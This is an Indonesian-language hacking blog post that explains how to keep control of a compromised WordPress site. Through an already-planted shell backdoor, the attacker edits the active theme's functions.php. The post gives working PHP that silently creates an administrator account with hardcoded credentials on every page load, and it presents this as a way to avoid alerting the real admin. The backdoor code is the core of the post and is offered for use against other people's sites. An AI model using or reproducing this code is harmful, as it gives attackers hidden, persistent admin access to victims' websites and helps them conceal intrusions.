WordPress Add Admin without Login (Shell Backdoor)

Bagi kalian para pemain wordpress hacking mungkin sudah banyak tau akan berbagai trik seperti membuat hidden shell, hidden uploader ataupun berbagai trik lainya untuk bisa mengelabuhi admin web tertentu. Untuk kali ini saya ingin menuliskan sedikit tips yang biasa saya lakukan setelah membuat hidden shell yakni menambahkan user wordpress dengan role administrator tanpa login secara menual menggunakan shell backdoor.

Jika menggunakan fitur dari berbagai shell backdoor tak lain hanya mereset sebuah password admin asli web tersebut yang mana hanya akan membuat admin tersebut curiga. Maka dengan tips ini akan menjadi salah satu solusi.

Kita bisa memanfaatkan file functions.php yang ada pada folder theme yang aktif. edit file tersebut menggunakan shell backdoor. Ingat edit pada themes yang aktif, untuk melihatnya cukup view-source (ctrl+u) pada web target dan liat struktur style pertama yang dipanggil pada path /wp-content/themes/*

Jika sudah ketemu, akses file functions.php menggunakan akses shell kalian

/wp-content/themes/{namathemes}/functions.php

Kemudian tambahkan code berikut :

function add_admin_acct(){
$login = 'tegalsec';
$passw = 'tegal1337';
$email = 'root@tegalsec.org';
if ( !username_exists( $login ) && !email_exists( $email ) ) {
$user_id = wp_create_user( $login, $passw, $email );
$user = new WP_User( $user_id );
$user->set_role( 'administrator' );
}
}
add_action('init','add_admin_acct');

 

 

 

 

Setelah itu simpan kemudian akses halaman login website tersebut (target.com/wp-login.php) dengan user password yang sudah disimpan tadi.

cukup simple bukan, mungkin itu saja yang bisa saya jelaskan terima kasih.

One thought on “WordPress Add Admin without Login (Shell Backdoor)

Leave a Reply

Your email address will not be published. Required fields are marked *

We are all close together

A problem, a bug, a question, an emergency?
Do not hesitate to visit the help centre, we can help you.

Copyright © 2021 Tegal1337. All rights reserved